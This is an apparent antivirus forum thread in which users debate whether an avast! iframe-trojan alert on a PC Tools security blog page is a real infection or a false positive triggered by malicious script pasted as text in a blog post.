Doing my daily rounds of security blogs I went to hxxp://www.pctools.com/security-news/ and Avast! immediately alerted of this threat:
hxxp://www.pctools.com/security-news/l>{gzip}
High Threat: HTML:IFrame-EL [Trj]
Perhaps the site has been compromised OR this is a False Positive.
EDIT: I have run a few site tests and all report clean bar the Avast! Alert.
Welcome to the forums, Issviews 
Apparently, it was a real infection as the page/link has been taken down.
See the image below and click it to enlarge it.
Thanks for the welcome ;D
Perhaps it was a real infection but only Avast identified this and still does, contrary to other AV results! It has been pointed out that this could be a false positive detecting a HTML element on the web page in error. See: http://www.mywot.com/en/forum/8965-pctools-blog-flags-trohan-alert
The post that “giedrius” made here is on the mark.
Although some things I would question:
The code actually looks to be posted in full. (the obfuscated forms)
Detections of malwares spreading with Iframes from html code is poor at the best.I would disagree, this is one of the main vectors for spreading malware nowadays with hacked sites daily, and AV companies are always looking to combat this.
Because the code is posted directly (and by the looks of it in full) it also exists in the source code. This means that when avast! will scan the page, it will see that code and generate an alert.
This is exactly the reason that I (and others here) recommend the posting of malicious code as images, as this problem will not arise.
The original page you mentioned now redirects to the home page. Is that what it normally did? If it used to show a preview of the posts, it also could have caused an alert.
Scott
Off topic:
Coincidently, having looked at that blog post, it shows images of a malicious site that I have seen in another thread here: http://forum.avast.com/index.php?topic=68953.0
No, it did not redirect to the homepage at all and did show a preview of security related articles written by PC Tools. I have checked the security news page just now and Avast sill bounces up with an alert. Perhaps they have suffered the same attack that geeks 2 Go has late last year too, with implanted HTML elements.
I still cannot get it to produce an alert on that page, for me it just redirects to pctools.com
No, it did not redirect to the homepage at all and did show a preview of security related articles written by PC Tools.Yes, then this would explain the detection on that page, as it is loading a preview of the page that it does alert on (the holiday blog post.)
I do get the alert (might be linked to a reported script as reported above)
I too am getting the same alert on the page as Logos.
However I’m unable to actually access the file content to have it analysed at virustotal or other sites as I normally do, as for some reason I can’t access the unp9999999.tmp file.
Maybe my computer is too secure… ;D It always goes to the home page for me…no idea why…
From reading the blog post and what Issviews has said, I think the alert originates from this blog post:
hXXp://www.pctools.com/security-news/fancy-a-work-from-home-scam-with-that-holiday/
This post is then previewed on the …/security-news/ page causing the alert there also.
Hardly too secure as yours is going somewhere as ours doesn’t go anywhere, it is stopped dead in its tracks.
Haha, probably…was more of a joke 
Malzilla picks up the redirect, and the page reports 301 - moved permanantly
Also:
Wenshield report file.
07/01/2011 14:46:22 hXXp://www.pctools.com/security-news [+] is OK
07/01/2011 14:46:22 hXXp://www.pctools.com/security-news/ [+] is OK
07/01/2011 14:46:22 hXXp://www.pctools.com/ [+] is OK
Just checked this page again using my previous Firefox bookmark and low and behold the url now hits hXXp://blog.pctools.com/freeav/page/2/ and also on the main blog page at hXXp://blog.pctools.com which both report 3 simultaneous avast alerts saying the same details as in my OP!
Having looked at the page, it redirects me to /security-news/ and that gives me an alert now…but I still think it is down to the blog post with the script that is posted within it.
Hello,
there is pasted bad script as plain text, so it will be better if they will use image instead of this text.
Milos
Thanks Milos,
They are aware of this, I have posted a comment on the blog.
One thing I would like to know is does avast! detect all of the scripts?
When i tested the page, it only seemed to alert on one, I was hoping it would have been alerting on all of them. Would you take a look at the scripts and see if they are added?
Scott
Thanks all, for the feedback
On using my FF bookmark I now get redirected to the PC Tools homepage. Hopefully they will fix the script error and their blog will be back to normal.